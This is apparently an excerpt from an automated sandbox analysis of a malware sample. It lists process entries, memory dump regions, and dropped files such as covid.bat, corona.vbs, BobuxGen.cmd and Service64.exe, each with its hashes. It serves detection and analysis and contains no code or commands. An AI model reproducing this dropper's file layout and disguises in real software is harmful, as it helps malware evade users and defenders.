C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Network

Files

memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp

memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp

memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd

MD5 47f426fb3883f2da30e9aa2a7d693fa5
SHA1 50d843d68817717f21ba96d26a571ad996a5e35a
SHA256 b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b
SHA512 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs

MD5 a0679dce64fcf875f4208b823d4b85c0
SHA1 85abe3673db82bfe5b2c207dc98648e32afffea0
SHA256 85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1
SHA512 1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe

MD5 c875f76e521f520404401122bd82630a
SHA1 3b1c78420a55b9a768b28168753c4e22982421ef
SHA256 a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11
SHA512 b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

C:\Users\Admin\AppData\Local\Temp\C18B.tmp\note.bmp

MD5 ed30c76a614ec8db5e4ac22e2929f53d
SHA1 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4
SHA256 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a
SHA512 ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat

MD5 b08e02e536917f897acb2d21f42f0a97
SHA1 a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45
SHA256 2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c
SHA512 1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\bg.bmp

MD5 cb065726febf9c1a581f3008e678f524
SHA1 f9a0058a57213cf7ce72eddf0616a938c8f4f4b1
SHA256 d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f
SHA512 b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bmp

MD5 738bbd119d8877f8342e1ff00fe60dff
SHA1 fc11d85e3c5b46bd877e06985fec1a601ce396ed
SHA256 548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb
SHA512 f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe

MD5 e62ee6f1efc85cb36d62ab779db6e4ec
SHA1 da07ec94cf2cb2b430e15bd0c5084996a47ee649
SHA256 13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a
SHA512 8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe

MD5 9254ca1da9ff8ad492ca5fa06ca181c6
SHA1 70fa62e6232eae52467d29cf1c1dacb8a7aeab90
SHA256 30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6
SHA512 a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs

MD5 e61624dced063c4ba5352bf487f12410
SHA1 40bd08928900cd97f444ffaa78d93dcaf913b274
SHA256 82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3
SHA512 2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac

memory/752-78-0x0000000000400000-0x0000000000484000-memory.dmp

memory/4088-77-0x0000000000400000-0x00000000004A4000-memory.dmp

memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp

memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C498.tmp\blood.bmp

MD5 040d29b801e3488f7aee3f9708128eea
SHA1 433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256 fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA512 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe

MD5 b53852cb556ec28efc39b986caddb791
SHA1 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
SHA256 ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
SHA512 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599